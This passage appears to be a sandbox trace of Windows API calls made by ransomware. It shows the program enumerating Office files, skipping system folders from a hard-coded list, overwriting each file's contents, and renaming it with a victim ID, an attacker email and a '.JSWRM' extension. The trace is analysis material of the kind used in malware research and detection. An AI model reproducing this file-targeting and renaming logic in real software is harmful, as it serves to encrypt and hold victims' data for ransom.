(HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0131.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsOutgoingImage.jpg", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0131.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0131.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsOutgoingImage.jpg", cchWideChar=22, lpMultiByteStr=0x240f48, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommsOutgoingImage.jpg", lpUsedDefaultChar=0x0) returned 22 [0131.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0131.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0131.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0131.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b1c8 [0131.409] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImage.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsoutgoingimage.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.410] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=8896) returned 1 [0131.410] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.410] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x22c0) returned 0x27b348 [0131.410] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x22c0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x22c0, lpOverlapped=0x0) returned 1 [0131.413] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.413] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x22c0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x22c0, lpOverlapped=0x0) returned 1 [0131.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0131.413] CloseHandle (hObject=0x264) returned 1 [0131.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0131.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0131.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0131.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0131.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0131.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0131.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0131.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0131.413] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0131.413] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0131.413] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2476a8 [0131.414] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x166) returned 0x1ff448 [0131.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0131.414] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0131.414] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImage.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsoutgoingimage.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImage.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsoutgoingimage.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0131.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0131.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0131.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0131.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0131.415] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19817013, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19817013, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19817013, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9d8, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="CommsOutgoingImageMask.bmp", cAlternateFileName="COMMSO~1.BMP")) returned 1 [0131.415] lstrcmpiW (lpString1="CommsOutgoingImageMask.bmp", lpString2=".") returned 1 [0131.415] lstrcmpiW (lpString1="CommsOutgoingImageMask.bmp", lpString2="..") returned 1 [0131.415] lstrcmpiW (lpString1="CommsOutgoingImageMask.bmp", lpString2="...") returned 1 [0131.415] lstrcmpiW (lpString1="CommsOutgoingImageMask.bmp", lpString2="windows") returned -1 [0131.415] lstrcmpiW (lpString1="CommsOutgoingImageMask.bmp", lpString2="recovery") returned -1 [0131.415] lstrcmpiW (lpString1="CommsOutgoingImageMask.bmp", lpString2="perflogs") returned -1 [0131.415] lstrcmpiW (lpString1="CommsOutgoingImageMask.bmp", lpString2="documents and settings") returned -1 [0131.415] lstrcmpiW (lpString1="CommsOutgoingImageMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.415] lstrcmpiW (lpString1="CommsOutgoingImageMask.bmp", lpString2="system volume information") returned -1 [0131.415] lstrcmpiW (lpString1="CommsOutgoingImageMask.bmp", lpString2="msocache") returned -1 [0131.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0131.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsOutgoingImageMask.bmp", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0131.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0131.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsOutgoingImageMask.bmp", cchWideChar=26, lpMultiByteStr=0x2412b8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommsOutgoingImageMask.bmp", lpUsedDefaultChar=0x0) returned 26 [0131.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0131.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0131.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsOutgoingImageMask.bmp", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0131.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0131.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsOutgoingImageMask.bmp", cchWideChar=26, lpMultiByteStr=0x241128, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommsOutgoingImageMask.bmp", lpUsedDefaultChar=0x0) returned 26 [0131.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0131.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247d70 [0131.415] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0131.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247990 [0131.415] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsoutgoingimagemask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.416] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=2520) returned 1 [0131.416] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.416] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x9d0) returned 0x20c6c0 [0131.416] ReadFile (in: hFile=0x264, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x9d0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345de64*=0x9d0, lpOverlapped=0x0) returned 1 [0131.418] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.418] WriteFile (in: hFile=0x264, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x9d0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345de60*=0x9d0, lpOverlapped=0x0) returned 1 [0131.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0131.418] CloseHandle (hObject=0x264) returned 1 [0131.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247b80 [0131.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0131.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0131.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0131.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0131.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0131.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0131.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0131.418] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0131.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0131.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x2476a8 [0131.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x166) returned 0x1ff448 [0131.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0131.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0131.419] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsoutgoingimagemask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImageMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsoutgoingimagemask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0131.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0131.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0131.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0131.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0131.420] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198afa29, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198afa29, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198afa29, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x630, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="CommsOutgoingImageMaskSmall.bmp", cAlternateFileName="COMMSO~2.BMP")) returned 1 [0131.420] lstrcmpiW (lpString1="CommsOutgoingImageMaskSmall.bmp", lpString2=".") returned 1 [0131.420] lstrcmpiW (lpString1="CommsOutgoingImageMaskSmall.bmp", lpString2="..") returned 1 [0131.420] lstrcmpiW (lpString1="CommsOutgoingImageMaskSmall.bmp", lpString2="...") returned 1 [0131.420] lstrcmpiW (lpString1="CommsOutgoingImageMaskSmall.bmp", lpString2="windows") returned -1 [0131.420] lstrcmpiW (lpString1="CommsOutgoingImageMaskSmall.bmp", lpString2="recovery") returned -1 [0131.420] lstrcmpiW (lpString1="CommsOutgoingImageMaskSmall.bmp", lpString2="perflogs") returned -1 [0131.420] lstrcmpiW (lpString1="CommsOutgoingImageMaskSmall.bmp", lpString2="documents and settings") returned -1 [0131.420] lstrcmpiW (lpString1="CommsOutgoingImageMaskSmall.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.420] lstrcmpiW (lpString1="CommsOutgoingImageMaskSmall.bmp", lpString2="system volume information") returned -1 [0131.420] lstrcmpiW (lpString1="CommsOutgoingImageMaskSmall.bmp", lpString2="msocache") returned -1 [0131.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0131.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsOutgoingImageMaskSmall.bmp", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0131.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0131.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsOutgoingImageMaskSmall.bmp", cchWideChar=31, lpMultiByteStr=0x2410d8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommsOutgoingImageMaskSmall.bmp", lpUsedDefaultChar=0x0) returned 31 [0131.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0131.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0131.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsOutgoingImageMaskSmall.bmp", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0131.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0131.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsOutgoingImageMaskSmall.bmp", cchWideChar=31, lpMultiByteStr=0x2412b8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommsOutgoingImageMaskSmall.bmp", lpUsedDefaultChar=0x0) returned 31 [0131.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0131.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247990 [0131.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0131.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247f60 [0131.420] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImageMaskSmall.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsoutgoingimagemasksmall.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.422] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=1584) returned 1 [0131.422] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x630) returned 0x2332c0 [0131.422] ReadFile (in: hFile=0x264, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x630, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345de64*=0x630, lpOverlapped=0x0) returned 1 [0131.423] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.423] WriteFile (in: hFile=0x264, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345de60*=0x630, lpOverlapped=0x0) returned 1 [0131.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0131.424] CloseHandle (hObject=0x264) returned 1 [0131.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf0) returned 0x247d70 [0131.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0131.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0131.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0131.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0131.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0131.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0131.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0131.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0131.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0131.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0131.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x17e) returned 0x201d10 [0131.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0131.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0131.424] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImageMaskSmall.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsoutgoingimagemasksmall.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImageMaskSmall.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\commsoutgoingimagemasksmall.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x201d10 | out: hHeap=0x1e0000) returned 1 [0131.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0131.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0131.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0131.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0131.425] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198634b7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x198634b7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19889710, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1dd7, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="CommsOutgoingImageSmall.jpg", cAlternateFileName="COMMSO~2.JPG")) returned 1 [0131.425] lstrcmpiW (lpString1="CommsOutgoingImageSmall.jpg", lpString2=".") returned 1 [0131.425] lstrcmpiW (lpString1="CommsOutgoingImageSmall.jpg", lpString2="..") returned 1 [0131.425] lstrcmpiW (lpString1="CommsOutgoingImageSmall.jpg", lpString2="...") returned 1 [0131.425] lstrcmpiW (lpString1="CommsOutgoingImageSmall.jpg", lpString2="windows") returned -1 [0131.426] lstrcmpiW (lpString1="CommsOutgoingImageSmall.jpg", lpString2="recovery") returned -1 [0131.426] lstrcmpiW (lpString1="CommsOutgoingImageSmall.jpg", lpString2="perflogs") returned -1 [0131.426] lstrcmpiW (lpString1="CommsOutgoingImageSmall.jpg", lpString2="documents and settings") returned -1 [0131.426] lstrcmpiW (lpString1="CommsOutgoingImageSmall.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.426] lstrcmpiW (lpString1="CommsOutgoingImageSmall.jpg", lpString2="system volume information") returned -1 [0131.426] lstrcmpiW (lpString1="CommsOutgoingImageSmall.jpg", lpString2="msocache") returned -1 [0131.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0131.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CommsOutgoingImageSmall.jpg", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, 